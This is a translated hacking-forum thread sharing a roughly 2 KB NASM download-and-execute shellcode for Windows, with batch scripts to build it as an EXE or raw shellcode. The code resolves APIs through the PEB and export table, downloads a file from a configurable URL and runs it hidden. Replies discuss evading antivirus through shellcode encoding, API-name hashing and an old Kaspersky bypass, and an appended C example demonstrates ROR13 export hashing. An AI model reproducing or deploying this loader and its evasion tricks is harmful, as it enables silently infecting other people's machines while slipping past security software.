NASM File Downloader - Shell Code
-
;Author : Ersan YAKIT ersanyakit@yahoo.com.tr
;http://www.offensive-security.com/metasploit-unleashed/Msfencode
%define DEBUGMODE

section .code
bits 32
global EntryPoint

; Marker bytes ("APOCALYPSE", " LEGENDZ") placed in front of the entry point
EY_PROTECT_START: db 0x41,0x50,0x4F,0x43,0x41,0x4C,0x59,0x50,0x53,0x45
EY_PROTECT_END:   db 0x20,0x4C,0x45,0x47,0x45,0x4E,0x44,0x5A

EntryPoint:
    CALL InitMe
InitMe:
    POP EBP                         ; EBP = runtime address of InitMe
    SUB EBP, InitMe                 ; EBP = delta between assembled and runtime addresses

    ; Find the kernel32.dll base through the PEB:
    ; FS:[0x30] = PEB, +0x0C = Ldr, +0x14 = InMemoryOrderModuleList.Flink (this exe),
    ; next entry = ntdll.dll, next entry = kernel32.dll, +0x10 = DllBase of that entry
    XOR EAX, EAX
    MOV EAX, [FS:0x30]
    MOV EAX, [EAX+0x0C]
    MOV EAX, [EAX+0x14]
    MOV EAX, [EAX]
    MOV EAX, [EAX]
    MOV EAX, [EAX+0x10]
    PUSH EAX                        ; keep the kernel32 base on the stack

    ; GETPROCEDUREADDRESS: EAX = module base, EDI = name, returns EAX = address
    LEA EDI, [EBP + szLoadLibraryA]
    CALL GETPROCEDUREADDRESS
    LEA EDI, [EBP + kernel32dll]
    PUSH EDI
    CALL EAX                        ; LoadLibraryA("kernel32.dll")

    ; DeleteFileA(filepath)
    LEA EDI, [EBP + szDeleteFileA]
    CALL GETPROCEDUREADDRESS
    PUSH filepath                   ; assembled absolute address, not EBP-relative
    CALL EAX

%ifdef DEBUGMODE
    ; Load MESSAGEBOX API
    MOV EAX, dword [ESP]            ; kernel32 base
    LEA EDI, [EBP + szLoadLibraryA]
    CALL GETPROCEDUREADDRESS
    LEA EDI, [EBP + user32dll]
    PUSH EDI
    CALL EAX                        ; LoadLibraryA("user32.dll")
    LEA EDI, [EBP + szMessageBoxA]
    CALL GETPROCEDUREADDRESS
    ; Execute MESSAGEBOX: MessageBoxA(0, mbtext, mbtitle, 0)
    PUSH 0
    PUSH mbtitle
    PUSH mbtext
    PUSH 0
    CALL EAX
%endif

    ; Load URLDownloadToFileA API
    MOV EAX, dword [ESP]
    LEA EDI, [EBP + szLoadLibraryA]
    CALL GETPROCEDUREADDRESS
    LEA EDI, [EBP + szurlmondll]
    PUSH EDI
    CALL EAX                        ; LoadLibraryA("urlmon.dll")
    LEA EDI, [EBP + szURLDownloadToFileA]
    CALL GETPROCEDUREADDRESS
    ; Call URLDownloadToFileA(NULL, szURL, szDownloadTo, 0, NULL)
    PUSH 0
    PUSH 0
    PUSH szDownloadTo
    PUSH szURL
    PUSH 0
    CALL EAX

    ; Load WinExec
    MOV EAX, dword [ESP]
    LEA EDI, [EBP + szLoadLibraryA]
    CALL GETPROCEDUREADDRESS
    LEA EDI, [EBP + kernel32dll]
    PUSH EDI
    CALL EAX
    LEA EDI, [EBP + szWinExec]
    CALL GETPROCEDUREADDRESS
    ; Call WinExec(szDownloadTo, SW_HIDE)
    PUSH 0
    PUSH szDownloadTo
    CALL EAX

    ; Load ExitProcess
    POP EAX                         ; kernel32 base
    LEA EDI, [EBP + szExitProcess]
    CALL GETPROCEDUREADDRESS
    ; Call ExitProcess(0)
    PUSH 0
    CALL EAX

; Walk the export directory of the module at EAX and return in EAX the address
; of the export whose name is at EDI (0 if not a PE image or not found).
GETPROCEDUREADDRESS:
    PUSH ECX
    PUSH EDX
    PUSH EBX
    PUSH ESI
    MOV EBX, dword [EAX + 03Ch]     ; e_lfanew
    ADD EBX, EAX                    ; EBX = IMAGE_NT_HEADERS
    CMP word [EBX], 04550h          ; "PE"
    JNZ API_CMP_FIND_ERROR
    MOV EBX, [EBX + 078h]           ; export directory RVA
    ADD EBX, EAX
    MOV ECX, [EBX + 018h]           ; NumberOfNames
    DEC ECX
    MOV EDX, [EBX + 020h]           ; AddressOfNames
    ADD EDX, EAX
API_CMP_FIND_LOOP:
    MOV ESI, [EDX + ECX * 4]        ; ESI = export name at index ECX
    ADD ESI, EAX
    PUSH EDI
    PUSH EAX
    PUSH EBX
API_CMP_LOOP:
    MOV AL, byte [ESI]
    MOV BL, byte [EDI]
    SUB AL, BL
    JNE API_CMP_DIFFERENT
    CMP BL, 0
    JZ API_CMP_EQUAL
    INC ESI
    INC EDI
    JMP API_CMP_LOOP
API_CMP_DIFFERENT:
    POP EBX
    POP EAX
    POP EDI
    LOOP API_CMP_FIND_LOOP          ; counts down from NumberOfNames-1; name index 0 is never compared
    JMP API_CMP_FIND_ERROR
API_CMP_EQUAL:
    POP EBX
    POP EAX
    POP EDI
    MOV EDX, [EBX + 024h]           ; AddressOfNameOrdinals
    ADD EDX, EAX
    MOV CX, [EDX + ECX * 2]         ; ordinal of the matching name
    MOV EDX, [EBX + 01Ch]           ; AddressOfFunctions
    ADD EDX, EAX
    MOV EBX, [EDX + ECX * 4]        ; function RVA
    ADD EAX, EBX                    ; EAX = base + RVA
    POP ESI
    POP EBX
    POP EDX
    POP ECX
    RET
API_CMP_FIND_ERROR:
    XOR EAX, EAX
    POP ESI
    POP EBX
    POP EDX
    POP ECX
    RET

section .data
user32dll            db 0x75,0x73,0x65,0x72,0x33,0x32,0x2E,0x64,0x6C,0x6C, 0                                        ;"user32.dll"
kernel32dll          db 0x6B,0x65,0x72,0x6E,0x65,0x6C,0x33,0x32,0x2E,0x64,0x6C,0x6C, 0                              ;"kernel32.dll"
szurlmondll          db 0x75,0x72,0x6C,0x6D,0x6F,0x6E,0x2E,0x64,0x6C,0x6C, 0                                        ;"urlmon.dll"
szLoadLibraryA       db 0x4C,0x6F,0x61,0x64,0x4C,0x69,0x62,0x72,0x61,0x72,0x79,0x41,0                               ;"LoadLibraryA"
szExitProcess        db 0x45,0x78,0x69,0x74,0x50,0x72,0x6F,0x63,0x65,0x73,0x73,0                                    ;"ExitProcess"
szMessageBoxA        db 0x4D,0x65,0x73,0x73,0x61,0x67,0x65,0x42,0x6F,0x78,0x41,0                                    ;"MessageBoxA"
szDeleteFileA        db 0x44,0x65,0x6C,0x65,0x74,0x65,0x46,0x69,0x6C,0x65,0x41,0                                    ;"DeleteFileA"
szSleep              db 0x53,0x6C,0x65,0x65,0x70,0                                                                  ;"Sleep" (unused)
szURLDownloadToFileA db 0x55,0x52,0x4C,0x44,0x6F,0x77,0x6E,0x6C,0x6F,0x61,0x64,0x54,0x6F,0x46,0x69,0x6C,0x65,0x41,0 ;"URLDownloadToFileA"
szWinExec            db 0x57,0x69,0x6E,0x45,0x78,0x65,0x63,0                                                        ;"WinExec"
filepath             db 0x66,0x75,0x63,0x6B,0x79,0x6F,0x75,0x2E,0x74,0x78,0x74,0
mbtitle              db 0x4F,0x68,0x21,0x20,0x53,0x69,0x6D,0x6F,0x6E,0x2C,0
mbtext               db 0x49,0x20,0x68,0x61,0x76,0x65,0x20,0x62,0x65,0x65,0x6E,0x20,0x74,0x68,0x69,0x6E,0x6B,0x20,0x61,0x62,0x6F,0x75,0x74,0x20,0x79,0x6F,0x75,0x20,0x73,0x6F,0x20,0x6D,0x75,0x63,0x68,0x21,0x20,0x41,0x72,0x65,0x20,0x79,0x6F,0x75,0x20,0x4F,0x4B,0x41,0x59,0x3F,0
szURL                db "http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe", 0
szDownloadTo         db "PuttyDownload.exe", 0
-
Batch script for EXE output
Edited by wh0 on 10/Jan/15 14:42
@echo off
SET ProjectName=PROJEADI
REM Cleaning Up...
IF EXIST %ProjectName%.exe DEL %ProjectName%.exe
IF EXIST %ProjectName%.obj DEL %ProjectName%.obj
REM Compiling...
nasm -fobj -DEXECUTABLE %ProjectName%.asm -o %ProjectName%.obj
REM Linking...
alink -c -oPE -subsys gui %ProjectName%.obj -entry EntryPoint
REM Cleaning Up...
IF EXIST %ProjectName%.obj DEL %ProjectName%.obj
PAUSE
Batch script for shellcode output
@echo off
SET ProjectName=PROJEADI
REM Cleaning Up...
IF EXIST %ProjectName%.bin DEL %ProjectName%.bin
REM Compiling...
nasm -fbin %ProjectName%.asm -o %ProjectName%.bin
PAUSE
-
Also, it would be great if you wrote up a short usage note and what exactly it does.
-
176  szURL db "http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe", 0
177  szDownloadTo db "PuttyDownload.exe", 0
Edit these fields to suit yourself and save the code as PROJEADI.asm.
To compile, NASM must be installed on your system. If what you need is an exe, take the bat code for producing an exe; if shellcode, take the bat code for producing shellcode (both are posted above). Save it as derle.bat in the same directory as PROJEADI.asm and you can compile with it.
It downloads a file from any address and runs it; the output size is something like 2 KB.
-
Is it FUD, Ersan? It's downloader code, man... It automatically downloads an exe and runs it. Weapon of mass destruction :)
-
aLman wrote:
Is it FUD, Ersan? It's downloader code, man... It automatically downloads an exe and runs it. Weapon of mass destruction :)
Whether or not URLDownloadToFileA from urlmon.dll is called, that API is flagged as unwanted software by all antivirus products. You can make it unrecognizable with small modifications. Honestly, I haven't tested it against antivirus products. But you can take the shellcode output and encode the shellcode with any shellcode encoder. So it's not fwb++. For those who don't know how shellcode is encoded:
http://www.offensive-security.com/metasploit-unleashed/Msfencode
-
Shellcode to executable:
http://www.tahribat.com/Forum-Delphi-Shellcode-2-Executable-204320/
You can easily convert the .bin file of the shellcode you built with asm into an executable PE format with the Delphi application above.
Additional info:
The asm code above runs as an executable, but if it is converted to shellcode it will not work. I haven't said why, so that malicious people don't compile and use it. Anyone who knows a little asm can replace the necessary places with the code I give below;
LEA EDI,[EBP+BLAHBLAHBLAH]
PUSH EDI
Good luck.
-
2 KB is really good, man =)
Even though that URLDownloadToFile API is the thing that makes antiviruses most suspicious, nice work =)
If you iterate over the functions inside the DLL, compare against a hash of the function name and pick the one that matches, the antivirus may not complain.
-
HolyOne wrote:
2 KB is really good, man =)
Even though that URLDownloadToFile API is the thing that makes antiviruses most suspicious, nice work =)
If you iterate over the functions inside the DLL, compare against a hash of the function name and pick the one that matches, the antivirus may not complain.
Thanks, bro;
http://tahribat.com/Forum-Gelistiriciler-Icin-C-To-Nasm-Donusturme-Ornegi-204364/
http://tahribat.com/Forum-Nasm-File-Downloader-Shell-Code-203995/
http://tahribat.com/Forum-Delphi-Shellcode-2-Executable-204320/
These 3 threads are related to each other ;)
The code in the C-to-NASM conversion thread was the emulator needed for the old Kaspersky bypass.
I don't know whether it still works these days... I'll combine them and test when I have free time ;)
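To show what the export-table walk in GETPROCEDUREADDRESS from the first post actually does, and what HolyOne's suggestion of matching exports by a hash of the name instead of the string itself changes, here is an added C example; it is not code from this thread or from any of the linked tools. It builds a small fake PE32 image in memory with a constructed export directory of four names and resolves exports both by name and by a ROR13 hash computed over the name (the same per-byte rotate-and-add as Metasploit's block_api, simplified here to the function-name part only, without the module-name part). The image layout, the export names and the RVAs are all made up for the demo; the header field offsets (e_lfanew at 0x3C, export directory at pe+0x78, NumberOfNames at +0x18, AddressOfFunctions +0x1C, AddressOfNames +0x20, AddressOfNameOrdinals +0x24) are the real PE ones the NASM routine uses. Unlike the original's LOOP countdown from NumberOfNames-1, the walk here also tests name index 0.

```c
/*
 * Added example: resolve PE exports by name and by ROR13 name hash over a
 * constructed in-memory image. Everything about the image (names, RVAs,
 * layout) is made up for the demo; the header field offsets are the real
 * PE32 ones, identical to those used by the NASM GETPROCEDUREADDRESS routine.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IMG_SIZE 0x400
static uint8_t g_img[IMG_SIZE];

/* Explicit little-endian accessors: PE fields are little-endian regardless of host. */
static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void put32(uint8_t *p, uint32_t v) { put16(p, (uint16_t)v); put16(p + 2, (uint16_t)(v >> 16)); }
static uint16_t get16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t get32(const uint8_t *p) { return get16(p) | ((uint32_t)get16(p + 2) << 16); }

/* Constructed export table: names stored sorted (as real linkers emit them); the
 * ordinal array maps each name to a non-identity slot in AddressOfFunctions. */
static const char *const kNames[]   = { "CreateFileA", "ExitProcess", "LoadLibraryA", "WinExec" };
static const uint32_t    kFuncRva[] = { 0x1000, 0x1100, 0x1200, 0x1300 };
static const uint16_t    kOrdinal[] = { 3, 0, 1, 2 };  /* CreateFileA->0x1300, ExitProcess->0x1000, ... */

/* Build a flat PE32 image where RVA == offset (no sections), mirroring the "base + RVA"
 * arithmetic on a loaded module: e_lfanew at 0x3C, "PE\0\0" at 0x80, export directory RVA
 * at pe+0x78, export directory at 0x200, arrays at 0x240/0x260/0x280, name strings at 0x300. */
uint8_t *build_image(void) {
    uint8_t *img = g_img, *ed = g_img + 0x200;
    uint32_t str = 0x300;
    memset(img, 0, IMG_SIZE);
    img[0] = 'M'; img[1] = 'Z';
    put32(img + 0x3C, 0x80);               /* e_lfanew */
    memcpy(img + 0x80, "PE\0\0", 4);       /* IMAGE_NT_SIGNATURE */
    put32(img + 0x80 + 0x78, 0x200);       /* DataDirectory[EXPORT].VirtualAddress */
    put32(img + 0x80 + 0x7C, 0x100);       /* DataDirectory[EXPORT].Size (unused by the walk) */
    put32(ed + 0x10, 1);                   /* Base */
    put32(ed + 0x14, 4);                   /* NumberOfFunctions */
    put32(ed + 0x18, 4);                   /* NumberOfNames */
    put32(ed + 0x1C, 0x240);               /* AddressOfFunctions */
    put32(ed + 0x20, 0x260);               /* AddressOfNames */
    put32(ed + 0x24, 0x280);               /* AddressOfNameOrdinals */
    for (int i = 0; i < 4; i++) {
        size_t n = strlen(kNames[i]) + 1;
        put32(img + 0x240 + 4 * i, kFuncRva[i]);
        put32(img + 0x260 + 4 * i, str);
        put16(img + 0x280 + 2 * i, kOrdinal[i]);
        memcpy(img + str, kNames[i], n);
        str += (uint32_t)n;
    }
    return img;
}

/* ROR13 hash over the name bytes including the terminating NUL (block_api style, function-name
 * part only). A hash-based shellcode carries this 32-bit constant instead of the string. */
uint32_t ror13_hash(const char *s) {
    uint32_t h = 0;
    do {
        h = (h >> 13) | (h << 19);
        h += (uint8_t)*s;
    } while (*s++ != '\0');
    return h;
}

typedef int (*match_fn)(const char *export_name, const void *key);
static int match_name(const char *n, const void *key) { return strcmp(n, (const char *)key) == 0; }
static int match_hash(const char *n, const void *key) { return ror13_hash(n) == *(const uint32_t *)key; }

/* Walk the export directory of the module at 'base' and return base + RVA of the first export
 * accepted by 'match', or 0 if the image is not PE or nothing matches. Checks every index, 0 included. */
static uintptr_t resolve_export(const uint8_t *base, match_fn match, const void *key) {
    uint32_t pe = get32(base + 0x3C);
    if (get16(base + pe) != 0x4550) return 0;          /* "PE" */
    const uint8_t *ed      = base + get32(base + pe + 0x78);
    uint32_t       n_names = get32(ed + 0x18);
    const uint8_t *funcs   = base + get32(ed + 0x1C);
    const uint8_t *nametab = base + get32(ed + 0x20);
    const uint8_t *ords    = base + get32(ed + 0x24);
    for (uint32_t i = 0; i < n_names; i++) {
        const char *name = (const char *)base + get32(nametab + 4 * i);
        if (match(name, key)) {
            uint16_t ord = get16(ords + 2 * i);        /* index into AddressOfFunctions */
            return (uintptr_t)base + get32(funcs + 4 * ord);
        }
    }
    return 0;
}

uintptr_t resolve_by_name(const uint8_t *base, const char *name) { return resolve_export(base, match_name, name); }
uintptr_t resolve_by_hash(const uint8_t *base, uint32_t hash)    { return resolve_export(base, match_hash, &hash); }

int main(void) {
    uint8_t *img = build_image();
    for (int i = 0; i < 4; i++) {
        uint32_t h = ror13_hash(kNames[i]);
        printf("%-13s hash=%08x by_name=+0x%04lx by_hash=+0x%04lx\n", kNames[i], h,
               (unsigned long)(resolve_by_name(img, kNames[i]) - (uintptr_t)img),
               (unsigned long)(resolve_by_hash(img, h) - (uintptr_t)img));
    }
    printf("URLDownloadToFileA hash=%08x (the constant a hash-based build would embed)\n",
           ror13_hash("URLDownloadToFileA"));
    printf("Sleep -> %lu (not exported by this image)\n", (unsigned long)resolve_by_name(img, "Sleep"));
    return 0;
}
```

Run as is, it prints each constructed export with its hash and the offset reached by both lookups, plus the constant for URLDownloadToFileA. The point of the hash path for HolyOne's remark is that the blob no longer contains the API name as a byte string; the call into urlmon.dll still happens at runtime, so this only addresses the static string, not what the code does.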